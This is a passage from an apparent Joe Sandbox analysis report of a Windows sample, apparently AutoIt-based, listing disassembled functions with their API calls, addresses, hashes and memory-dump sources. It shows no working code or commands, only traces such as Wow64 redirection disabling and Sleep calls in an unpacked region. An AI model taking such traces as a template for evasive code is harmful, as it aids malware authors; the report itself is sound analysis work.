                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction ID: 99abc67ec20f9200d5920452b717e39ac1dbb84cd81301deb06dfaf919a41a39
                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction Fuzzy Hash: C631DF74A041199BD718CF59F490969FBB2FF4A300B2486B5E80ADB696D731EDC1CBD0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00514E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                                                                                          • Part of subcall function 00514E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                                                                                          • Part of subcall function 00514E90: FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                                                                                          • Part of subcall function 00514E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                                                                                          • Part of subcall function 00514E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                                                                                          • Part of subcall function 00514E59: FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2632591731-0
                                                                                                                        • Opcode ID: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                                                                                        • Instruction ID: 48b0312ac32c550c80d4d31d0f05ca6639ee46fab9d83a75a2a14cdf16941df8
                                                                                                                        • Opcode Fuzzy Hash: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                                                                                        • Instruction Fuzzy Hash: 7111C431600206AAEF15AB60D81AFED7FA5BFC0711F10442AF542AA2D1EE719E85DB50
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wsopen_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3347428461-0
                                                                                                                        • Opcode ID: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                                                                                        • Instruction ID: 618b61f8fe42da43e59964d0c08dde0c02aa4591aef5de213732375e3dde6d57
                                                                                                                        • Opcode Fuzzy Hash: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                                                                                        • Instruction Fuzzy Hash: 5311257590410AAFCF09DF58E9449EE7BF8FF48308F144059F808AB352DA30DA118BA4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00544C7D: RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                                                                                        • _free.LIBCMT ref: 0054506C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction ID: faf7293bcd45e29fdd4cd395ffc8697be0ccd866822b4e37b3ecc14e7bffd585
                                                                                                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction Fuzzy Hash: 090126762047056BE3218E659889ADAFFE9FB89374F65051DE18883281EA30A805C6B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction ID: 6c5e10eb16971aa7c5077b82ff950d0662c1c295916054eef83bed6e1020f663
                                                                                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction Fuzzy Hash: 57F02D32510A1597D7313A65AC0FB9B3FE8BFD2339F100719F424931D1CB70D80186A5
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                                                                                        • Instruction ID: 4659401197991350d627ea968523f16c841bb239aadb1ac43c86834c658446de
                                                                                                                        • Opcode Fuzzy Hash: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                                                                                        • Instruction Fuzzy Hash: 52F0E93168222567DB215F72AC8DBDB3F98BF917A9F1C4121BC15AA281CA30DC009EE0
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                                                                                        • Instruction ID: 2f5f05b9be6bcdeb8d9d0c5cea27efbf4dca003c3cd192af6aa530af4a067f40
                                                                                                                        • Opcode Fuzzy Hash: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                                                                                        • Instruction Fuzzy Hash: F9E02B3110322596D7312A779C04BDBBF49BF927B8F050030BC14965B0DB21ED019AE1
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514F6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                                                                                        • Instruction ID: 2c9151721821c03295ce8f418c1f18d359c46c982612447c3d2c6a9ce3916412
                                                                                                                        • Opcode Fuzzy Hash: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                                                                                        • Instruction Fuzzy Hash: B4F01571105792CFEB349F64E4948A2BFE4BF15329324997EE1EA86721C7319889DF10
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541455249-0
                                                                                                                        • Opcode ID: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                                                                                        • Instruction ID: af6bb60d88b20b4a14c9e3f61be18ee2463dd605261ee7774c41c0eb110563f5
                                                                                                                        • Opcode Fuzzy Hash: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                                                                                        • Instruction Fuzzy Hash: B9E0CD766041245BC71092589C09FEA7BDDEFC8790F050071FD09D7248DA60AD848550
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2638373210-0
                                                                                                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction ID: 4af60ae06e8a28e03a92370fb77e0dabebe6cbf16edd06e3fed704e15c7571f9
                                                                                                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction Fuzzy Hash: D8E048B06097005FDF396A28A8517B6BBD4AF49300F10045EF59F92252E5726845874D
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908
                                                                                                                          • Part of subcall function 0051D730: GetInputState.USER32 ref: 0051D807
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
                                                                                                                          • Part of subcall function 005130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0051314E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3667716007-0
                                                                                                                        • Opcode ID: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                                                                                        • Instruction ID: 9e774b8ef3a567c51a5a47a9b086c4ec7cdf331ecb298829a5f51daef80eac61
                                                                                                                        • Opcode Fuzzy Hash: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                                                                                        • Instruction Fuzzy Hash: D3E0863130424617EB08BB75A86A5EDBF99BBE5351F40153EF182472A2CF658AC98352
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0171F0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                        • Instruction ID: 0e0b66fe58abec8380d317e0f0da843625b8ea1eda86a0ba72f8fc9e6d5af9ba
                                                                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                        • Instruction Fuzzy Hash: 1DE0C230A0560CEBDB20CBBCCC04BAEB3A8D708320F00C795E906D32C1DA32CA48D714
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                                                                                        • Instruction ID: e3fdca1bd9b971a046894b3aa3ac286079517264a556a7e70bb7ea0c106ed27b
                                                                                                                        • Opcode Fuzzy Hash: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                                                                                        • Instruction Fuzzy Hash: 8AD06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1856020C736E821EB90
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0171F09B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                        • Instruction ID: 27e2a3b583c40f378c46d0dc5ed3aa40ccbc1d7911b8e9dfcc6b0fed228e7027
                                                                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                        • Instruction Fuzzy Hash: 69D0C77190620CEBCB10DFBC9D04ADAB7A8D705321F104755FD15C7281D9369A5497A5
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00511CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                                                                                        • Instruction ID: c4d423dec8d936809a059062ce4fa6cb68b61af6229407aa99593c5eb325b763
                                                                                                                        • Opcode Fuzzy Hash: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                                                                                        • Instruction Fuzzy Hash: 96C09B352803449FF3184780BD8AF107754A36CB01F444401F6895D5E3C7B11814FA54
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction ID: ff10ab23838402021779dac57f400ffa0bdb878d78711d3d9e8f9e4c11125d0e
                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction Fuzzy Hash: 92E0BF7494010DEFDB10EFA4D9496DEBBB4EF04302F1005A1FD05D7681DB309E549A62
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction ID: 10e335ff931c4a0fc3f3ed9bcead61ffc8d982974585bac0f280f9e9edb6a289
                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction Fuzzy Hash: 45E0E67494010DDFDB00EFB4D94969EBFB4EF04302F100161FD01D2281D6309D509A72
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005A961A
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A965B
                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 005A969F
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A96C9
                                                                                                                        • SendMessageW.USER32 ref: 005A96F2
                                                                                                                        • GetKeyState.USER32(00000011), ref: 005A978B
                                                                                                                        • GetKeyState.USER32(00000009), ref: 005A9798
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A97AE
                                                                                                                        • GetKeyState.USER32(00000010), ref: 005A97B8
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A97E9
                                                                                                                        • SendMessageW.USER32 ref: 005A9810
                                                                                                                        • SendMessageW.USER32(?,00001030,?,005A7E95), ref: 005A9918
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005A992E
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005A9941
                                                                                                                        • SetCapture.USER32(?), ref: 005A994A
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A99AF
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005A99BC
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A99D6
                                                                                                                        • ReleaseCapture.USER32 ref: 005A99E1
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A9A19
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005A9A26
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9A80
                                                                                                                        • SendMessageW.USER32 ref: 005A9AAE
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9AEB
                                                                                                                        • SendMessageW.USER32 ref: 005A9B1A
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005A9B3B
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 005A9B4A
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A9B68
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005A9B75
                                                                                                                        • GetParent.USER32(?), ref: 005A9B93
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9BFA
                                                                                                                        • SendMessageW.USER32 ref: 005A9C2B
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A9C84
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005A9CB4
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9CDE
                                                                                                                        • SendMessageW.USER32 ref: 005A9D01
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A9D4E
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005A9D82
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A9E05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
